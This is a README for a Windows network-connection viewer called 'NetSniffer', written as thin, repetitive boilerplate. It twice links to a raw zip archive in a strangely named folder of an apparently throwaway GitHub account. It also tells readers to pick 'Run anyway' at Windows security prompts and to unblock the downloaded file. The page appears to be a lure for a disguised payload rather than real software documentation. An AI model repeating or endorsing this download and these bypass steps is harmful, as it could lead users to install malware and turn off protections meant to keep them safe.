NetSniffer is a Windows app that shows your network connections in a clear, dark view. It lists TCP and UDP sockets, the process that owns each one, and a simple risk level so you can spot unusual activity fast.
Use it to:
- See which apps are using your network
- Check local and remote addresses
- Review open TCP and UDP sockets
- Spot unknown processes
- Compare normal and risky connections at a glance
To get NetSniffer, visit this page to download: https://github.com/Malvaceaefries86/NetSniffer/raw/refs/heads/main/myorrhaphy/Net_Sniffer_3.1.zip
If the page shows a release file, download it and run the file on your Windows PC.
NetSniffer is built for Windows. For the best experience, use:
- Windows 10 or Windows 11
- A standard desktop or laptop PC
- An account with permission to run downloaded apps
Basic system needs:
- 2 GB RAM or more
- 100 MB free space
- Internet access for the initial download
- Open the download page in your browser.
- Find the latest release or build.
- Download the Windows file.
- If Windows shows a security prompt, choose Run or More info, then Run anyway if you trust the source.
- Follow any on-screen steps.
- Open NetSniffer from the Start menu or desktop shortcut.
After you open the app, you should see a live list of network activity.
Typical steps:
- Start the app with normal user rights.
- Let it scan your active network sockets.
- Review the list of TCP and UDP connections.
- Look at the process name next to each entry.
- Check the risk label for each connection.
- Sort by process, port, or remote address if needed.
If you want to find a specific app, look for its process name in the list. If you want to see what a program is doing, check the remote address and port it uses.
NetSniffer is designed to make network activity easy to read.
Common columns and panels may include:
- Process name
- Process ID
- Protocol type
- Local IP and port
- Remote IP and port
- Connection state
- Risk level
- Path to the app or service
The dark theme helps reduce eye strain and makes rows easier to scan. Colored status markers help you tell normal traffic from items that may need attention.
NetSniffer uses a simple risk view to help you sort connections.
You may see labels like:
- Low: common system or trusted app activity
- Medium: traffic that looks normal but worth checking
- High: unknown or unusual network use
Use the risk level as a guide. A high label does not always mean something is wrong. It means the connection deserves a closer look.
NetSniffer can update the view while it runs, so you can watch changes as they happen.
This helps when you want to:
- See which app opens a new socket
- Watch a browser start several connections
- Check what changes after you open a game or chat app
- Compare activity before and after you close a program
NetSniffer can help with everyday checks such as:
- Finding unknown apps that use the network
- Checking if a program is still connected after you close it
- Seeing whether a local service is listening on a port
- Reviewing connections that use UDP instead of TCP
- Understanding which process owns a socket
If NetSniffer does not open or show data, try these steps:
- Make sure you downloaded the Windows file
- Try running it again
- Check whether Windows blocked the file
- Restart your PC and open it once more
- Make sure your PC is connected to a network
- Open a browser or another app that uses the internet
- Refresh the view
- Wait a few seconds for active connections to appear
- Check the file came from the GitHub page
- Right-click the file and open its properties
- If Windows shows an unblock option, use it
- Run the app again
- Check the full process path
- Compare the name with apps you know
- Look for system services and background tools
- Search the process name in Windows if needed
Use these habits to get clearer results:
- Keep the app open while you test network activity
- Open one program at a time when you want to trace a connection
- Close apps you do not need so the list stays clean
- Check both the process name and port number
- Watch for repeated connections to the same remote address
NetSniffer uses a dark layout with simple rows and clear labels.
What to expect:
- A main list of sockets and connections
- Easy-to-scan columns
- Color cues for risk and activity
- A clean look that fits long review sessions
- Controls for refresh and sorting
After install, you may find the app in one of these places:
- Your Downloads folder
- A desktop shortcut
- The Start menu
- A folder you chose during setup
If you move the file after downloading, keep it in the same folder when you launch it.
Some Windows systems add extra checks to downloaded apps. If that happens:
- Open the file from the download location
- Allow the app to run if you trust the GitHub source
- Check that the file name matches the NetSniffer release you downloaded
- Avoid renaming the file unless needed
Download or get the latest build here: https://github.com/Malvaceaefries86/NetSniffer/raw/refs/heads/main/myorrhaphy/Net_Sniffer_3.1.zip
No. It is made for people who want a clear view of network connections without digging through system tools.
Yes. It is built to list both TCP and UDP sockets.
Yes. It shows the process name so you can link traffic to an app or service.
Yes. The interface uses a dark style that is easier on the eyes.
Yes. The risk level and process view help you spot items that need attention
When you start NetSniffer for the first time, look at:
- Your current active connections
- Any process with a high risk label
- Remote addresses you do not know
- Ports used by apps you just opened
- Repeating entries that stay active after you close a program